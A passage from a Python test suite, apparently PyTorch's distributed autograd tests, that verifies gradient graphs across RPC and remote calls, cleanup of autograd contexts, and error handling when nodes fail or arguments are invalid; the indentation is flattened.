# Retrieve the next functions in the graph.
next_funcs = send_function.next_functions
self.assertEqual(2, len(next_funcs))
# We should now hit t1 and t2 in the autograd graph.
self.assertEqual("torch::autograd::AccumulateGrad", next_funcs[0][0].name())
self.assertEqual(t1, next_funcs[0][0].variable)
self.assertEqual(0, next_funcs[0][1])
self.assertEqual("torch::autograd::AccumulateGrad", next_funcs[1][0].name())
self.assertEqual(t2, next_funcs[1][0].variable)
self.assertEqual(0, next_funcs[1][1])
# Test recv functions.
self.assertEqual(ret.grad_fn, recv_function)
# For a context passed from previous nested chain calls, this rank
# receives two tensors t1 and t2, executes torch.add(t1, t2) and sends
# result tensor t3 back.
# For this context in this rank, it expects graph like this:
# send and recv functions:
# rpcSendBackward
# |
# t3.AddBackward0
# / \
# t1.recvRpcBackward t2.recvRpcBackward
def _verify_graph_for_rpc_call_exec(self, send_function):
# Verify next function is AddBackward0
next_funcs = send_function.next_functions
self.assertEqual(1, len(next_funcs))
add_backward_fn = next_funcs[0][0]
self.assertEqual("AddBackward0", add_backward_fn.name())
# Verify the next two functions are the same recv backward function.
next_funcs = add_backward_fn.next_functions
self.assertEqual(2, len(next_funcs))
self.assertEqual(
"torch::distributed::autograd::RecvRpcBackward", next_funcs[0][0].name()
)
self.assertEqual(
"torch::distributed::autograd::RecvRpcBackward", next_funcs[1][0].name()
)
self.assertEqual(next_funcs[0][0], next_funcs[1][0])
# For a context passed from previous nested chain calls, this rank
# receives two tensors t1 and t2, forwards t1 and t2 tensors using
# nested rpc call to next dst. In return route, receive result tensor t3
# from next dst and forwarding t3 back to previous calls.
# For this context in this rank, it expects graph like this:
# send and recv functions for receiving and forwarding t1 and t2:
# rpcSendBackward
# / \
# t1.recvRpcBackward t2.recvRpcBackward
# send and recv functions for receiving and forwarding t3:
# rpcSendBackward
# |
# t3.recvRpcBackward
def _verify_graph_for_nested_rpc_call(self, ctx):
send_functions = ctx._send_functions()
self.assertEqual(2, len(send_functions))
# For send function when making nest rpc call,
# next functions of the send function are two recv functions
# for received two tensors from previous call
next_funcs = list(send_functions.values())[0].next_functions
self.assertEqual(2, len(next_funcs))
self.assertEqual(
"torch::distributed::autograd::RecvRpcBackward", next_funcs[0][0].name()
)
self.assertEqual(
"torch::distributed::autograd::RecvRpcBackward", next_funcs[1][0].name()
)
self.assertEqual(next_funcs[0][0], next_funcs[1][0])
# For send function when returning resonpose to previous call
# next function of the send function is the recv function
# for received tensor result returned from nested call
next_funcs = list(send_functions.values())[1].next_functions
self.assertEqual(1, len(next_funcs))
self.assertEqual(
"torch::distributed::autograd::RecvRpcBackward", next_funcs[0][0].name()
)
def _test_graph(self, fn, exec_mode):
dst_rank = (self.rank + 1) % self.world_size
initialize_pg(self.file_init_method, self.rank, self.world_size)
with dist_autograd.context() as context_id:
t1 = torch.ones(3, 3, requires_grad=True)
t2 = torch.zeros(3, 3, requires_grad=True)
if ExecMode.RPC_SYNC == exec_mode:
ret = rpc.rpc_sync(worker_name(dst_rank), fn, args=(t1, t2))
elif ExecMode.REMOTE == exec_mode:
ret = rpc.remote(
worker_name(dst_rank), fn, args=(t1, t2)
).to_here()
else:
raise ValueError("Unrecognized ExecMode {}".format(exec_mode))
rpc.rpc_sync(
worker_name(dst_rank), _set_rpc_done, args=(context_id, 1)
)
# Verify graph for current context id.
ctx = dist_autograd._current_context()
self.assertEqual(context_id, ctx._context_id())
send_functions = ctx._send_functions()
self.assertEqual(1, len(send_functions))
recv_functions = ctx._recv_functions()
self.assertEqual(1, len(recv_functions))
self._verify_graph_for_first_rpc_call(
list(send_functions.values())[0],
list(recv_functions.values())[0],
t1,
t2,
ret,
)
# Wait for the prev rank to be done with rpc.
self._check_rpc_done(1)
# Verify graph for previous context id.
ctx = dist_autograd._retrieve_context(ctx_ids[1])
send_functions = ctx._send_functions()
self.assertEqual(1, len(send_functions))
self._verify_graph_for_rpc_call_exec(list(send_functions.values())[0])
# this barrier is needed so one worker does not clean up their
# autograd context before another worker tries to access it.
dist.barrier()
# autograd context should be cleaned up by now.
with self.assertRaises(RuntimeError):
ctx = dist_autograd._retrieve_context(context_id)
# No autograd context available.
with self.assertRaises(RuntimeError):
ctx = dist_autograd._current_context()
@dist_init
def test_graph_for_builtin_call(self):
self._test_graph(torch.add, ExecMode.RPC_SYNC)
@dist_init
def test_graph_for_python_call(self):
self._test_graph(my_py_add, ExecMode.RPC_SYNC)
@dist_init
def test_graph_for_builtin_remote_call(self):
self._test_graph(torch.add, ExecMode.REMOTE)
@dist_init
def test_graph_for_python_remote_call(self):
self._test_graph(my_py_add, ExecMode.REMOTE)
# 3-layer nested calls
def _test_graph_for_py_nested_call(self, exec_mode):
dst_rank = (self.rank + 1) % self.world_size
initialize_pg(self.file_init_method, self.rank, self.world_size)
with dist_autograd.context() as context_id:
t1 = torch.ones(3, 3, requires_grad=True)
t2 = torch.zeros(3, 3, requires_grad=True)
nest_dst_rank = (dst_rank + 1) % self.world_size
if ExecMode.RPC_SYNC == exec_mode:
ret = rpc.rpc_sync(
worker_name(dst_rank),
my_py_nested_call,
args=(t1, t2, dst_rank, self.world_size, 1),
)
elif ExecMode.REMOTE == exec_mode:
ret = rpc.remote(
worker_name(dst_rank),
my_py_nested_call,
args=(t1, t2, dst_rank, self.world_size, 1),
).to_here()
else:
raise ValueError("Unrecognized ExecMode {}".format(exec_mode))
# Barrier to ensure all RPCs are done.
dist.barrier()
for rd in [1, 2, 3]:
rpc.rpc_sync(
worker_name((self.rank + rd) % self.world_size),
_set_rpc_done,
args=(context_id, rd),
)
# Barrier to ensure all set_rpc_done have completed.
dist.barrier()
# For self.rank, it has 4 graphs to verify
# One is for current context id when this rank send first rpc call.
# Second one is for prev context id when this rank make 1st nested
# call.
# Third one is for prev prev context id when this rank make
# 2nd nested call.
# Last one is for prev prev prev context id when this rank
# execute the torch.add() operator.
# Verify first graph for current context id.
ctx = dist_autograd._current_context()
self.assertEqual(context_id, ctx._context_id())
send_functions = ctx._send_functions()
self.assertEqual(1, len(send_functions))
recv_functions = ctx._recv_functions()
self.assertEqual(1, len(recv_functions))
self._verify_graph_for_first_rpc_call(
list(send_functions.values())[0],
list(recv_functions.values())[0],
t1,
t2,
ret,
)
# Verify second graph for 1st nested call.
ctx = dist_autograd._retrieve_context(ctx_ids[1])
self._verify_graph_for_nested_rpc_call(ctx)
# Verify third graph for 2nd nested call.
ctx = dist_autograd._retrieve_context(ctx_ids[2])
self._verify_graph_for_nested_rpc_call(ctx)
# verify last graph for rpc call execution.
ctx = dist_autograd._retrieve_context(ctx_ids[3])
send_functions = ctx._send_functions()
self.assertEqual(1, len(send_functions))
self._verify_graph_for_rpc_call_exec(list(send_functions.values())[0])
# this barrier is needed so one worker does not clean up their
# autograd context before another worker tries to access it.
dist.barrier()
@dist_init
def test_graph_for_py_nested_call(self):
self._test_graph_for_py_nested_call(ExecMode.RPC_SYNC)
@dist_init
def test_graph_for_py_nested_remote_call(self):
self._test_graph_for_py_nested_call(ExecMode.REMOTE)
# Rank0->Rank1->Rank0
def _test_graph_for_py_nested_call_itself(self, exec_mode):
dst_rank = (self.rank + 1) % self.world_size
initialize_pg(self.file_init_method, self.rank, self.world_size)
with dist_autograd.context() as context_id:
t1 = torch.ones(3, 3, requires_grad=True)
t2 = torch.zeros(3, 3, requires_grad=True)
if ExecMode.RPC_SYNC == exec_mode:
ret = rpc.rpc_sync(
worker_name(dst_rank),
my_py_nested_call,
args=(
t1,
t2,
(self.rank - 1 + self.world_size) % self.world_size,
self.world_size,
0,
),
)
elif ExecMode.REMOTE == exec_mode:
ret = rpc.remote(
worker_name(dst_rank),
my_py_nested_call,
args=(
t1,
t2,
(self.rank - 1 + self.world_size) % self.world_size,
self.world_size,
0,
),
).to_here()
else:
raise ValueError("Unrecognized ExecMode {}".format(exec_mode))
rpc.rpc_sync(
worker_name((self.rank + 1) % self.world_size),
_set_rpc_done,
args=(context_id, 1),
)
# For self.rank, it has 2 graphs to verify.
# One is for current context id when this rank send first rpc
# call and execute the torch.add() operator.
# Another one is for prev context id when this rank make
# nested call.
ctx = dist_autograd._current_context()
self.assertEqual(context_id, ctx._context_id())
send_functions = ctx._send_functions()
self.assertEqual(2, len(send_functions))
recv_functions = ctx._recv_functions()
self.assertEqual(2, len(recv_functions))
self._verify_graph_for_first_rpc_call(
list(send_functions.values())[0],
list(recv_functions.values())[1],
t1,
t2,
ret,
)
self._verify_graph_for_rpc_call_exec(list(send_functions.values())[1])
# Verify two pairs of send and recv functions for nested
# call
self._check_rpc_done(1)
ctx = dist_autograd._retrieve_context(ctx_ids[1])
self._verify_graph_for_nested_rpc_call(ctx)
# this barrier is needed so one worker does not clean up their
# autograd context before another worker tries to access it.
dist.barrier()
@dist_init
def test_graph_for_py_nested_call_itself(self):
self._test_graph_for_py_nested_call_itself(ExecMode.RPC_SYNC)
@dist_init
def test_graph_for_py_nested_remote_call_itself(self):
self._test_graph_for_py_nested_call_itself(ExecMode.REMOTE)
def _test_no_graph_with_tensors_not_require_grad(self, exec_mode):
initialize_pg(self.file_init_method, self.rank, self.world_size)
dst_rank = (self.rank + 1) % self.world_size
with dist_autograd.context() as context_id:
t1 = torch.ones(3, 3, requires_grad=False)
t2 = torch.zeros(3, 3, requires_grad=False)
if ExecMode.RPC_SYNC == exec_mode:
ret = rpc.rpc_sync(
worker_name(dst_rank), torch.add, args=(t1, t2)
)
elif ExecMode.REMOTE == exec_mode:
ret = rpc.remote(
worker_name(dst_rank), torch.add, args=(t1, t2)
).to_here()
else:
raise ValueError("Unrecognized ExecMode {}".format(exec_mode))
rpc.rpc_sync(
worker_name(dst_rank), _set_rpc_done, args=(context_id, 1)
)
ctx = dist_autograd._current_context()
send_functions = ctx._send_functions()
self.assertEqual(len(send_functions), 0)
recv_functions = ctx._recv_functions()
self.assertEqual(len(recv_functions), 0)
# Wait for the prev rank to be done with rpc.
self._check_rpc_done(1)
# NB: RRef.to_here() always passes the autograd context to the
# the callee, as the caller does not know whether the return
# value would contain a requires_grad tensor or not.
#
# rpc/remote with udf (_set_rpc_done here) also always passes the
# autograd context to the callee due to the same reason.
self.assertNotEqual(-1, dist_autograd._retrieve_context(ctx_ids[1]))
dist.barrier()
@dist_init
def test_no_graph_with_tensors_not_require_grad(self):
self._test_no_graph_with_tensors_not_require_grad(ExecMode.RPC_SYNC)
@dist_init
def test_no_graph_with_tensors_not_require_grad_remote(self):
self._test_no_graph_with_tensors_not_require_grad(ExecMode.REMOTE)
def _test_grad_only_on_return_value(self, exec_mode):
initialize_pg(self.file_init_method, self.rank, self.world_size)
dst_rank = (self.rank + 1) % self.world_size
with dist_autograd.context() as context_id:
if ExecMode.RPC_SYNC == exec_mode:
ret = rpc.rpc_sync(worker_name(dst_rank), ret_requires_grad)
elif ExecMode.REMOTE == exec_mode:
ret = rpc.remote(
worker_name(dst_rank), ret_requires_grad
).to_here()
else:
raise ValueError("Unrecognized ExecMode {}".format(exec_mode))
dist_autograd.backward(context_id, [ret.sum()])
rpc.rpc_sync(
worker_name(dst_rank), _set_rpc_done, args=(context_id, 1)
)
# Wait for the prev rank to be done with rpc.
self._check_rpc_done(1)
grads = dist_autograd.get_gradients(ctx_ids[1])
self.assertEqual(1, len(grads))
self.assertIn(requires_grad_tensor, grads)
self.assertEqual(torch.ones_like(ret), grads[requires_grad_tensor])
# due to the above get_gradients call, ensure that dist autograd
# contexts aren't cleaned up until all workers exit context managers
dist.barrier()
@dist_init
def test_grad_only_on_return_value(self):
self._test_grad_only_on_return_value(ExecMode.RPC_SYNC)
@dist_init
def test_grad_only_on_return_value_remote(self):
self._test_grad_only_on_return_value(ExecMode.REMOTE)
def _test_rpc_complex_args(self, exec_mode):
with dist_autograd.context() as context_id:
num_tensors = 10
tensors = []
for i in range(num_tensors):
tensors.append(torch.ones(3, 3, requires_grad=(i % 2 == 0)))
dst_rank = self._next_rank()
if ExecMode.RPC_SYNC == exec_mode:
ret = rpc.rpc_sync(
worker_name(dst_rank), torch.stack, args=(tensors,)
)
elif ExecMode.REMOTE == exec_mode:
ret = rpc.remote(
worker_name(dst_rank), torch.stack, args=(tensors,)
).to_here()
else:
raise ValueError("Unrecognized ExecMode {}".format(exec_mode))
self.assertEqual(torch.stack(tensors), ret)
# Verify appropriate tensors have been attached the autograd graph.
next_funcs = list(
dist_autograd._current_context()._send_functions().values()
)[0].next_functions
idx = 0
for i in range(len(next_funcs)):
self.assertEqual(
"torch::autograd::AccumulateGrad", next_funcs[i][0].name()
)
self.assertEqual(tensors[i], next_funcs[i][0].variable)
# Verify that the worker id has been recorded in the context
ctx = dist_autograd._current_context()
worker_ids = ctx._known_worker_ids()
self.assertEqual(len(worker_ids), 1)
self.assertEqual(worker_ids, {dst_rank})
@dist_init
def test_rpc_complex_args(self):
self._test_rpc_complex_args(ExecMode.RPC_SYNC)
@dist_init
def test_remote_complex_args(self):
self._test_rpc_complex_args(ExecMode.REMOTE)
def context_cleanup_test_helper(self, rpc_args, func, nested=False):
initialize_pg(self.file_init_method, self.rank, self.world_size)
# test that in dist autograd, in the case that tensors communicated over RPC do
# NOT require grad, we still cleanup the dist autograd contexts created
# on other nodes. This is because the autograd context is still
# communicated over RPC even if tensor arguments do not require grad, as
# it is possible that the response could.
if nested:
dst_rank = (self.rank + 1) % self.world_size
nested_dst_rank = (dst_rank + 1) % self.world_size
dst_ranks = {dst_rank}
else:
dst_ranks = {rank for rank in range(self.world_size) if rank != self.rank}
with dist_autograd.context() as context_id:
for dst_rank in dst_ranks:
rpc.rpc_sync(worker_name(dst_rank), func, args=rpc_args)
rpc.rpc_sync(
worker_name(dst_rank), _set_rpc_done, args=(context_id, 1)
)
if nested:
rpc.rpc_sync(
worker_name(nested_dst_rank),
_set_rpc_done,
args=(context_id, 2),
)
# the thread's context id should be cleaned up
with self.assertRaises(RuntimeError):
dist_autograd._retrieve_context(context_id)
# Ensure all peers have finished mutating the
# `known_context_ids` set.
dist.barrier()
# check that all contexts have been cleaned up.
success = _all_contexts_cleaned_up()
self.assertTrue(success)
@dist_init
def test_context_cleanup_tensor_with_grad(self):
t1 = torch.ones(3, 3, requires_grad=True)
t2 = torch.zeros(3, 3, requires_grad=True)
self.context_cleanup_test_helper(rpc_args=(t1, t2), func=torch.add)
@dist_init
def test_context_cleanup_tensor_no_grad(self):
t1 = torch.ones(3, 3, requires_grad=False)
self.context_cleanup_test_helper(rpc_args=(t1, t1), func=torch.add)
@dist_init
def test_context_cleanup_no_tensors(self):
self.context_cleanup_test_helper(rpc_args=(1, 1), func=my_scalar_add)
@dist_init
def test_context_cleanup_nested_rpc(self):
t1 = torch.ones(3, 3, requires_grad=True)
t2 = torch.zeros(3, 3, requires_grad=True)
dst_rank = (self.rank + 1) % self.world_size
args = (t1, t2, dst_rank, self.world_size, 0)
self.context_cleanup_test_helper(
rpc_args=args, func=my_py_nested_call, nested=True
)
@dist_init
def test_worker_ids_recorded(self):
dst_ranks = {rank for rank in range(self.world_size) if rank != self.rank}
with dist_autograd.context() as context_id:
# if no tensors require grad, we should still record worker_ids, as
# the autograd context ID is still passed to other workers.
t1 = torch.ones(3, 3, requires_grad=False)
t2 = torch.zeros(3, 3, requires_grad=False)
for dst_rank in dst_ranks:
rpc.rpc_sync(worker_name(dst_rank), torch.add, args=(t1, t2))
rpc.rpc_sync(
worker_name(dst_rank), _set_rpc_done, args=(context_id, 1)
)
# all worker_ids in dst_ranks should be recorded.
ctx = dist_autograd._current_context()
worker_ids = ctx._known_worker_ids()
self.assertEqual(worker_ids, dst_ranks)
# worker_ids should be recorded when tensors do require grad
t1.requires_grad = True
t2.requires_grad = True
for dst_rank in dst_ranks:
ret = rpc.rpc_sync(
worker_name(dst_rank), torch.add, args=(t1, t2)
)
rpc.rpc_sync(
worker_name(dst_rank), _set_rpc_done, args=(context_id, 1)
)
# all worker_ids in dst_ranks should be recorded.
worker_ids = ctx._known_worker_ids()
self.assertEqual(worker_ids, dst_ranks)
@dist_init
def test_dist_autograd_profiling(self):
with dist_autograd.context() as context_id:
t1 = torch.rand(3, 3, requires_grad=True)
t2 = torch.rand(3, 3, requires_grad=True)
loss = rpc.rpc_sync(worker_name(self._next_rank()), torch.add, args=(t1, t2)).sum()
with torch.autograd.profiler.profile() as p:
dist_autograd.backward(context_id, [loss])
function_events = p.function_events
def get_event(partial_key):
return [event for event in function_events if partial_key in event.name][0]
send_event = get_event("SendRpcBackward")
recv_event = get_event("RecvRpcBackward")
backward_event = get_event("torch::distributed::autograd::backward")
# There should be at least 1 send and recv_events each, corresponding to send/recv functions executed.
self.assertEqual(send_event.count, 1)
self.assertEqual(recv_event.count, 1)
# The CPU total for backward event should be great than send and recv, since
# applying those functions in the backwards pass is a subset of the entire backward pass.
self.assertGreater(backward_event.cpu_time_total, send_event.cpu_time_total)
self.assertGreater(backward_event.cpu_time_total, recv_event.cpu_time_total)
@dist_init
def test_error_in_context(self):
with dist_autograd.context() as context_id:
t1 = torch.rand(3, 3, requires_grad=True)
t2 = torch.rand(6, 6, requires_grad=True)
with self.assertRaises(RuntimeError):
# This should throw an error since matrix sizes don't match.
rpc.rpc_sync(
worker_name(self._next_rank()), torch.matmul, args=(t1, t2)
)
def _verify_backwards(self, exec_mode, tensors, context_id, local_grads, *args):
if exec_mode == ExecMode.LOCAL:
torch.autograd.backward(tensors)
return [arg.grad for arg in args]
else:
self._verify_backwards_remote(tensors, context_id, local_grads, *args)
def _verify_backwards_remote(self, tensors, context_id, local_grads, *args):
dist_autograd.backward(context_id, tensors)
# Verify grads were accumulated appropriately.
grads = dist_autograd.get_gradients(context_id)
nargs = len(args)
ngrads = 0
for i in range(0, nargs):
if local_grads[i] is not None:
self.assertIn(args[i], grads)
self.assertEqual(local_grads[i], grads[args[i]])
ngrads += 1
else:
self.assertNotIn(args[i], grads)
self.assertEqual(ngrads, len(grads))
@dist_init
def test_backward_no_grad_on_tensor(self):
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
with dist_autograd.context() as context_id:
loss = rpc.rpc_sync(
worker_name(self._next_rank()),
torch.add,
args=(t1, t2)).sum()
dist_autograd.backward(context_id, [loss], retain_graph=True)
self.assertIsNone(t1.grad)
self.assertIsNone(t2.grad)
# Now populate .grad with local autograd engine and
# verify dist autograd doesn't mess with it.
loss_local = torch.add(t1, t2).sum()
loss_local.backward()
self.assertIsNotNone(t1.grad)
self.assertIsNotNone(t2.grad)
t1_grad_before = t1.grad
t2_grad_before = t2.grad
dist_autograd.backward(context_id, [loss])
self.assertEqual(t1_grad_before, t1.grad)
self.assertEqual(t2_grad_before, t2.grad)
def _test_backward_simple(self, dst):
# Run the same code locally and with dist autograd and verify gradients
# are same.
local_grads = None
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
for exec_mode in [ExecMode.LOCAL, ExecMode.RPC_SYNC, ExecMode.REMOTE]:
with dist_autograd.context() as context_id:
ret = self._exec_func_with_dst(
dst, exec_mode, torch.add, t1, t2
)
loss = ret.sum()
ret = self._verify_backwards(
exec_mode, [loss], context_id, local_grads, t1, t2
)
local_grads = ret if ret else local_grads
@dist_init
def test_backward_simple(self):
self._test_backward_simple(self._next_rank())
@dist_init
def test_backward_simple_self(self):
self._test_backward_simple(self.rank)
# The current rank first creates a tensor on the rref_owner, and then passes
# the rref with another tensor to the callee to run either my_rref_add or
# my_nested_rref_add, depending on whether the callee is the rref owner.
# The grad of tensor lives on the current rank, and the grad of the rref
# tensor lives on the rref owner.
def _test_backward_rref(self, callee, rref_owner):
local_grads = None
t1 = torch.ones((3, 3), requires_grad=True)
t2 = torch.zeros((3, 3), requires_grad=True)
local_ret = torch.add(t1, t2)
local_ret.sum().backward()
with dist_autograd.context() as context_id:
rref_t1 = rpc.remote(
rref_owner, _torch_ones, args=((3, 3),), kwargs={"requires_grad": True}
)
if callee == rref_owner:
rref = rpc.remote(callee, my_rref_add, args=(rref_t1, t2))
else:
rref = rpc.remote(
callee, my_nested_rref_add, args=(rref_owner, rref_t1, t2)
)
ret = rref.to_here()
dist_autograd.backward(context_id, [ret.sum()])
# verify grads on caller
grads = dist_autograd.get_gradients(context_id)
self.assertIn(t2, grads)
self.assertEqual(grads[t2], t2.grad)
# verify grads on rref owner
self.assertTrue(
rpc.rpc_sync(
rref_owner,
_compare_owner_value,
args=(context_id, rref_t1, t1.grad),
)
)
@dist_init
def test_backward_rref(self):
callee = worker_name(self._next_rank())
rref_owner = callee
self._test_backward_rref(callee, rref_owner)
@dist_init
def test_backward_rref_multi(self):
if self.rank > 0:
callee = "worker0"
rref_owner = callee
self._test_backward_rref(callee, rref_owner)
@dist_init
def test_backward_rref_nested(self):
callee = worker_name((self.rank + 1) % self.world_size)
rref_owner = worker_name((self.rank + 2) % self.world_size)
self._test_backward_rref(callee, rref_owner)
# In this test, every rank will serve as a parameter server (ps) and a
# driver, and then kicks off trainers on the other three ranks. So, we have:
# ps = rank0 with trainers = rank1/2/3
# ps = rank2 with trainers = rank2/3/0
# ps = rank3 with trainers = rank3/0/1
# ps = rank4 with trainers = rank0/1/2
#
# These four test ps-trainer groups run on completely separate autograd
# graphs, but they share the same set of underlying RpcAgents.
def _test_trainer_ps(self, create_ref_fn, trainer_fn):
local_grads = None
t1 = torch.ones((3, 3), requires_grad=True)
t2 = torch.zeros((3, 3), requires_grad=True)
local_ret = torch.add(t1, t2)
local_ret.sum().backward()
# create rref on self
rref_t1 = rpc.remote(
worker_name(self.rank),
create_ref_fn,
args=())
# kick off forward and backward pass on three other workers (trainers)
rank_diffs = [1, 2, 3]
futures = []
for rank_diff in rank_diffs:
futures.append(
rpc.rpc_async(
worker_name((self.rank + rank_diff) % self.world_size),
trainer_fn,
args=(rref_t1, t2, worker_name(self.rank), rank_diff),
)
)
# check if the trainers have done with their backward pass
for rank_diff in rank_diffs:
self._check_rpc_done(rank_diff)
# trainers are done and holding the context for verification
accumulate_grad_func = None
for rank_diff in rank_diffs:
# make sure grads are accumulated for the same tensors and values
# are all correct
ctx_id = ctx_ids[rank_diff]
grads = dist_autograd.get_gradients(ctx_id)
local_t1 = rref_t1.to_here()
self.assertIn(local_t1, grads)
self.assertEqual(grads[local_t1], t1.grad)
# unblock trainers
_set_rpc_done(None, 0)
# wait until all trainers are done
torch.futures.wait_all(futures)
@dist_init
def test_trainer_ps(self):
self._test_trainer_ps(create_tensor, _run_trainer)
@dist_init
def test_trainer_ps_torchscript_functions(self):
# TODO, need more investigation
# there is rref leak when shutting down, suspect it is because
# ref as arg is passed to pybind boundary, and the ref is not garbage
# collected by python when calling shutdown()
import torch.distributed.rpc.api as api
api._ignore_rref_leak = True
self._test_trainer_ps(create_torchscript_tensor, _run_trainer_torchscript)
@dist_init
def test_backward_multiple_round_trips(self):
local_grads = None
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3))
t3 = torch.rand((3, 3), requires_grad=True)
t4 = torch.rand((3, 3))
t5 = torch.rand((3, 3), requires_grad=True)
for exec_mode in [ExecMode.LOCAL, ExecMode.RPC_SYNC, ExecMode.REMOTE]:
with dist_autograd.context() as context_id:
# Multiple RPCs between different nodes.
val = self._exec_func(exec_mode, torch.add, t1, t2)
val = self._exec_func(exec_mode, torch.mul, t3, val)
s1 = self._exec_func(exec_mode, torch.stack, (t4, val))
s2 = self._exec_func(exec_mode, torch.stack, (t5, val))
val = self._exec_func(exec_mode, torch.bmm, s1, s2)
val = self._exec_func(exec_mode, torch.matmul, val, val)
loss = val.sum()
ret = self._verify_backwards(
exec_mode, [loss], context_id, local_grads, t1, t2, t3, t4, t5
)
local_grads = ret if ret else local_grads
@dist_init
def test_backward_different_tensor_dims(self):
local_grads = None
t1 = torch.rand((4, 6), requires_grad=True)
t2 = torch.rand((6, 5))
t3 = torch.rand((5, 7), requires_grad=True)
t4 = torch.rand((7, 9))
for exec_mode in [ExecMode.LOCAL, ExecMode.RPC_SYNC, ExecMode.REMOTE]:
with dist_autograd.context() as context_id:
val = self._exec_func(exec_mode, torch.matmul, t1, t2)
val = self._exec_func(exec_mode, torch.linalg.multi_dot, (val, t3, t4))
loss = val.sum()
ret = self._verify_backwards(
exec_mode, [loss], context_id, local_grads, t1, t2, t2, t3, t4
)
local_grads = ret if ret else local_grads
@dist_init
def test_backward_unused_tensors(self):
local_grads = None
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
t3 = torch.rand((3, 3), requires_grad=True)
for exec_mode in [ExecMode.LOCAL, ExecMode.RPC_SYNC, ExecMode.REMOTE]:
with dist_autograd.context() as context_id:
s = self._exec_func(exec_mode, torch.stack, (t1, t2, t3))
val = self._exec_func(
exec_mode,
torch.matmul,
torch.narrow(s, 0, 0, 1),
torch.narrow(s, 0, 2, 1),
)
loss = val.sum()
ret = self._verify_backwards(
exec_mode, [loss], context_id, local_grads, t1, t2, t3
)
local_grads = ret if ret else local_grads
@dist_init
def test_backward_multiple_output_tensors(self):
local_grads = None
t = torch.rand((10, 2), requires_grad=True)
for exec_mode in [ExecMode.LOCAL, ExecMode.RPC_SYNC, ExecMode.REMOTE]:
with dist_autograd.context() as context_id:
tensor_list = self._exec_func(exec_mode, torch.split, t, 2)
t1 = tensor_list[0]
t2 = tensor_list[2]
t3 = tensor_list[4]
val = self._exec_func(exec_mode, torch.linalg.multi_dot, (t1, t2, t3))
loss = val.sum()
ret = self._verify_backwards(
exec_mode, [loss], context_id, local_grads, t
)
local_grads = ret if ret else local_grads
def _run_test_backward_unused_send_function_in_thread(self):
with dist_autograd.context() as context_id:
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
# We don't use the result of an RPC function, as a result the
# backward pass would hang in the "FAST" mode.
res = rpc.rpc_sync(
worker_name(self._next_rank()), torch.add, args=(t1, t2)
)
val = torch.mul(t1, t2)
# Run backward, this would hang forever.
dist_autograd.backward(context_id, [val.sum()])
@dist_init
def test_backward_unused_send_function(self):
# Run the test in a thread which would never finish.
t = threading.Thread(
target=self._run_test_backward_unused_send_function_in_thread
)
t.daemon = True
t.start()
t.join(10) # Wait for 10s.
# Verify thread is still alive (indicating backward hasn't completed yet).
self.assertTrue(t.is_alive())
@dist_init
def test_backward_autograd_engine_error(self):
with dist_autograd.context() as context_id:
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
# Perform some ops before error simulation.
tmp = (t1 + t2) * (t1 + t2)
t3 = SimulateBackwardError.apply(tmp)
# Run multiple round trips across different nodes and verify the
# original node receives an error thrown on a node deep in the chain.
val = rpc.rpc_sync(
worker_name(self._next_rank()), torch.add, args=(t2, t3)
)
val = rpc.rpc_sync(
worker_name(self._next_rank()), torch.mul, args=(val, t2)
)
val = rpc.rpc_sync(
worker_name(self._next_rank()), torch.matmul, args=(val, t2)
)
val = rpc.rpc_sync(
worker_name(self._next_rank()), torch.div, args=(val, t2)
)
with self.assertRaisesRegex(
RuntimeError, "Error on Node [0-9]+: Simulate error on backward pass"
):
# Run backwards, and validate we receive an error.
dist_autograd.backward(context_id, [val.sum()])
@dist_init(clean_shutdown=False)
@unittest.skipIf(
IS_MACOS,
"Test is flaky on MacOS since libuv error handling is not as robust as TCP",
)
def test_backward_node_failure(self):
rpc._set_rpc_timeout(5) # 5 seconds
initialize_pg(self.file_init_method, self.rank, self.world_size)
with dist_autograd.context() as context_id:
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
res = rpc.rpc_sync(
worker_name(self._next_rank()), torch.add, args=(t1, t2)
)
# Wait for all RPCs to be done.
dist.barrier()
# Kill all odd rank nodes.
if self.rank % 2 == 0:
shutdown_error_regex = self.get_shutdown_error_regex()
# Wait for all other nodes to die.
for rank in range(self.world_size):
if rank % 2 != 0:
wait_until_node_failure(rank, shutdown_error_regex)
# Shutdown sequence is not very well defined and as a result
# we might see any error given by get_shutdown_error_regex()
with self.assertRaisesRegex(RuntimeError, shutdown_error_regex):
# Run backwards, and validate we receive an error since all
# other nodes are dead.
dist_autograd.backward(context_id, [res.sum()])
else:
# Exit all other nodes.
pass
@dist_init
def test_backward_without_context(self):
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
context_id = 100 # dummy context_id
with self.assertRaisesRegex(
RuntimeError,
"Could not find autograd context with id: {}".format(context_id),
):
res = rpc.rpc_sync(
worker_name(self._next_rank()), torch.add, args=(t1, t2)
)
dist_autograd.backward(context_id, [res.sum()])
@dist_init
def test_backward_without_rpc(self):
dst_rank = self.rank
with dist_autograd.context() as context_id:
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
t3 = torch.add(t1, t2)
dist_autograd.backward(context_id, [t3.sum()])
grads = dist_autograd.get_gradients(context_id)
self.assertEqual(2, len(grads))
self.assertIn(t1, grads)
self.assertIn(t2, grads)
self.assertEqual(torch.ones(3, 3), grads[t1])
self.assertEqual(torch.ones(3, 3), grads[t2])
@dist_init
def test_backward_invalid_args(self):
with dist_autograd.context() as context_id:
with self.assertRaisesRegex(TypeError, "incompatible function arguments"):
dist_autograd.backward(context_id, None)
with self.assertRaisesRegex(TypeError, "incompatible function arguments"):
dist_autograd.backward(None, None)
with self.assertRaisesRegex(
RuntimeError, "No tensors provided for gradient computation"
):
dist_autograd.backward(context_id, [])
with self.assertRaisesRegex(RuntimeError, "requires_grad not set on"):
t = torch.rand(3, 3)
dist_autograd.backward(context_id, [t])
with self.assertRaisesRegex(
RuntimeError, "is not a scalar, all roots need to be scalar"
):
t = torch.rand(3, 3, requires_grad=True)
dist_autograd.backward(context_id, [t])
with self.assertRaisesRegex(
RuntimeError, "does not have a valid gradient function"
):
